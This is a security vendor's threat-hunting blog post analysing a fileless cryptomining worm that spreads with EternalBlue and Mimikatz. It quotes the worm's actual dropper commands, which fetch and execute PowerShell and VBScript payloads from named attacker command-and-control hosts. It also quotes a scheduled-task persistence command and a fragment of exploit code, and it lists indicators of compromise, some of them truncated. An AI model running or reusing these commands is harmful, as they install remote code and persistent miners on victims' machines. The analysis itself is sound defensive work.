Threat Hunting, the Investigation of Fileless Malware Attacks https://www.pandasecurity.com/en/mediacenter/pandalabs/threat-hunting-fileless-attacks/ https://www.pandasecurity.com/en/mediacenter/pandalabs/threat-hunting-fileless-attacks/#comments Mon, 30 Oct 2017 14:48:38 +0000 https://www.pandasecurity.com/en/mediacenter/?p=20064

The alarms were raised when PandaLabs' Threat Hunting team noticed an unusual command, leading to the discovery of a fileless attack for cryptomining.

Fileless Monero WannaMine, a new attack discovered by PandaLabs

Mining cryptocurrencies like Bitcoin, Ethereum or Monero is nothing new. In fact, in recent years we have seen numerous attacks whose main objective is the installation of mining software. For example, it is worth remembering that before WannaCry, we had already seen attackers use the NSA EternalBlue exploit to infiltrate companies and install this type of software on their victims’ devices.

It’s safe to say that it is a booming business, as sophistication of the attacks continues to increase. A few days ago we detected a new worm that uses both hacking tools and scripts to spread through corporate networks and mine the Monero cryptocurrency in any network it makes its way into.

With Adaptive Defense, we monitor all running processes in real time on every computer where it is installed. When our Threat Hunting team observed the following command attempting to execute through one of the processes on one computer, alarms were raised:

cmd /v:on /c for /f “tokens=2 delims=.[” %i in (‘ver’) do (set a=%i)&if !a:~-1!==5 (@echo on error resume next>%windir%\11.vbs&@echo Set ox=CreateObject^(“MSXML2.XMLHTTP”^)>>%windir%\11.vbs&@echo ox.open “GET”,”http://stafftest.firewall-gateway.com:8000/info.vbs“,false>>%windir%\11.vbs&@echo ox.setRequestHeader “User-Agent”, “-“>>%windir%\11.vbs&@echo ox.send^(^)>>%windir%\11.vbs&@echo If ox.Status=200 Then>>%windir%\11.vbs&@echo Set oas=CreateObject^(“ADODB.Stream”^)>>%windir%\11.vbs&@echo oas.Open>>%windir%\11.vbs&@echo oas.Type=1 >>%windir%\11.vbs&@echo oas.Write ox.ResponseBody>>%windir%\11.vbs&@echo oas.SaveToFile “%windir%\info.vbs”,2 >>%windir%\11.vbs&@echo oas.Close>>%windir%\11.vbs&@echo End if>>%windir%\11.vbs&@echo Set os=CreateObject^(“WScript.Shell”^)>>%windir%\11.vbs&@echo os.Exec^(“cscript.exe %windir%\info.vbs”^)>>%windir%\11.vbs&cscript.exe %windir%\11.vbs) else (powershell -NoP -NonI -W Hidden “if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains(’64’)){IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info6.ps1′)}else{IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info3.ps1′)}“)

Analysis of Network Propagation

Soon after PandaLabs began its investigation, we observed how the attackers, knowing that they had been discovered, shut down their command and control servers; before they could, however, we were able to download the following files:

  • b6fcd1223719c8f6daf4ab7fbeb9a20a  ps1 ~4MB
  • 27e4f61ee65668d4c9ab4d9bf5d0a9e7  vbs ~2MB

They are two highly obfuscated scripts. “Info6.ps1” loads a Mimikatz module (a DLL) reflectively (leaving the disk untouched) so that it can steal credentials. These credentials are used later to move laterally across internal (unprotected) networks.

The script implements, in PowerShell, the famous NetBIOS exploit known as EternalBlue (MS17-010), so that it can proceed to infect other not-yet-patched Windows computers on the network.

$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
[byte[]]$feaList=[byte[]](0x00,0x00,0x01,0x00)
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00

At the same time it makes use of WMI to remotely execute commands. Once the passwords for a computer are obtained, we see the “wmiprvse.exe” process on that computer execute a command line similar to the following:

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad…

If we decode the “base 64” of this command line, we obtain the script shown in Annex I.

Persistence in the System

Within one of the scripts, the following command can be found to achieve persistence in the system:

cmd /c echo powershell -nop “$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(‘SCM Event Filter’)))) {IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.spdns.eu:8000/mate6.ps1’)}” >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR “%temp%\y1.bat” &&SCHTASKS /run /TN yastcat

As you can see, it schedules a daily task that downloads and executes the “y1.bat” file.

Note that we do not have this file at our disposal, as the command and control servers are currently offline.

Infection Vector

We still do not know the initial infection vector, since the networks on which we detected and blocked the infection were in the process of deploying Adaptive Defense at that time and did not yet have the whole network protected with our advanced cybersecurity solution. For this reason, we have not been able to determine who the “patient zero” was and how it became compromised.

It could be a download/execution of a file/Trojan that initially activated the worm, or it could have been executed remotely using some exploit.

Command and Control Servers

From the “info6.ps1” script, we were able to obtain the following command and control servers.

  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95

Note that on October 27, 2017, these servers ceased to be operational:

  • 118.184.48.95
  • 107.179.67.243
  • stafftest.spdns.eu
  • stafftest.firewall-gateway.com

IOCs

  • exe ( Monero, MD5 2ad7a39b17d08b3a685d36a23bf8d196 )
  • %windir%\11.vbs
  • %windir%\info.vbs
  • %windir%\info6.ps1
  • dll
  • dll
  • Scheduled task “yastcat”
  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95

Conclusion

Once again, we are witnessing the professionalization of increasingly advanced attacks. Even when the goal is only to install Monero miners (leaving aside data theft, sabotage, or espionage), attackers are using advanced techniques and sharp tactics. Because the attack is fileless, most traditional antivirus solutions can barely counteract or even detect it, and its victims can only wait for the necessary signatures to be generated (the attack is fileless, but as we have seen, at one point both the scripts and the Monero client are downloaded).

But those signatures only serve for this particular attack and will be useless against anything that varies even slightly, not to mention that only the end of the attack is detected, without seeing how it moves through the network and compromises computers.

Because Adaptive Defense classifies all running processes on every computer, we are able to monitor the entire network in real time, something which is becoming increasingly necessary as attackers resort to malwareless techniques in which they abuse legitimate system tools.

Among the events we monitor, we can find:

  • Process creation and remote injection
  • Creation, modification and opening of files
  • Creation and modification of registry entries
  • Network events (opening of connections, file downloads, etc.)
  • Administrative events (creation of users, etc.)

We will keep you updated with any findings from our Threat Hunting, as well as the detection of any new attacks.
